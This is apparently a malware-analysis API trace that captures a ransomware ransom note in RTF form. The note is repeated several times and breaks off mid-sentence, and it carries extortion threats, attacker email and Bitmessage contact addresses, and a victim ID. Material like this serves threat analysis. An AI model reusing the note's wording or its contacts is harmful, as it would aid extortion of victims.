br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t 